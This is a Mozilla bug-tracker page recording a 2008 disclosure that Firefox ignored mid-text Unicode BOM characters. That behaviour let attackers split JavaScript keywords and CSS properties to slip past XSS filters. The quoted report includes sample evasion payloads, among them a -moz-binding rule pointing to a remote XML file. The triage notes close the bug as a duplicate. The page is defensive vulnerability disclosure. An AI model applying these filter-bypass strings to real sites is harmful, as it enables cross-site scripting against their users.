Closed Bug 446112 Opened 16 years ago Closed 16 years ago

Stripping in-line BOM is an XSS risk

Categories

(Core :: DOM: HTML Parser, defect)

defect
Not set
normal

Tracking

()

RESOLVED DUPLICATE of bug 430740

People

(Reporter: dveditz, Unassigned)

References

Details

(Whiteboard: [sg:dupe 430740])

Attachments

(1 file)

This is much like JavaScript bug 430740 but affects HTML/CSS parsing. security@m.o. received the following from Chris Weber of Casaba Security:

July 17, 2008

Platform: Windows XP SP3 and SP2
Product: Firefox 3.0.1
Issue Type: attack technique for filter bypass and evasion which enables cross-site scripting
Exploitability: Easy
Remote: Yes

Here's an attack that leverages a vulnerability in the way Firefox handles Unicode Byte Order Marks U+FEFF and U+FFFE in the javascript interpreter.  The Unicode spec and FAQ at http://unicode.org/faq/utf_bom.html calls for implementations to treat a BOM in the middle of a file as ZWNBS.  The best behavior would be to make the ZWNBS a part of the string, which would have the effect of difusing any attack exploiting this technique.

"Q: What should I do with U+FEFF in the middle of a file?
A: In the absence of a protocol supporting its use as a BOM and when not at the beginning of a text stream, U+FEFF should normally not occur. For backwards compatibility it should be treated as ZERO WIDTH NON-BREAKING SPACE (ZWNBSP), and is then part of the content of the file or string."

Right now, we can insert a BOM in the middle of javascript method names, strings, and keywords such as 'var'.  This enables exploits where attackers can control fragments of javascript such as:

var x = "here's a U+FEFF in the middle of a string";
alert(x);
al[U+FEFF]ert("heres a U+FEFF in the middle of the alert() method name");
v[U+FEFF]ar y = "here's a U+FEFF in the middle of the var keyword";
alert(y);

We can also insert a BOM in the middle of a CSS string such as -moz-binding, enabling attacks which bypass validation filters.  The attack would look like:

p { -moz-bi[U+FEFF]nding: url(http://casabasecurity.com/stage/example_2.xml#redirect) }

I'll stop elaborating from here.  In short this issue allows for a lot of flexibility in bypassing validation or other logic attackers might want to bypass to enable attacks such as cross-site scripting.

Thanks,
Chris
Group: security
Blocks: xss
The JavaScript part is covered by bug 430740, this bug is to cover similar issues in HTML/XML/CSS parsing. Bug 430740 happens to Firefox 2.0, but the -moz-binding issue seems to be a regression in FF3.
No longer blocks: xss
Whiteboard: [sg:high]
Blocks: xss
I was fooled by running the testcase on Chris's site, which is not quite the one attached here (doesn't have the BOM in -moz-binding). When running on my own server I could only reproduce the JavaScript cases covered by bug 430740 and not any problems with BOM injected into HTML tags and attributes or style data.
Status: NEW → RESOLVED
Closed: 16 years ago
Resolution: --- → DUPLICATE
Whiteboard: [sg:high] → [sg:dupe 430740]
I didn't mean to fool you with regard to the CSS BOM injection, it was a mistake on my part.  As you said I can't reproduce that either right now.  Back to testing,
Chris
Didn't mean to imply it might have been intentional fooling, I fooled myself going too fast through my first triage pass. No harm done, and thanks again for reporting the JavaScript problem--it's a serious potential XSS risk.
Forgot to credit Chris in the advisory. Updated
http://www.mozilla.org/security/announce/2008/mfsa2008-43.html
Group: core-security
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Created:
Updated:
Size: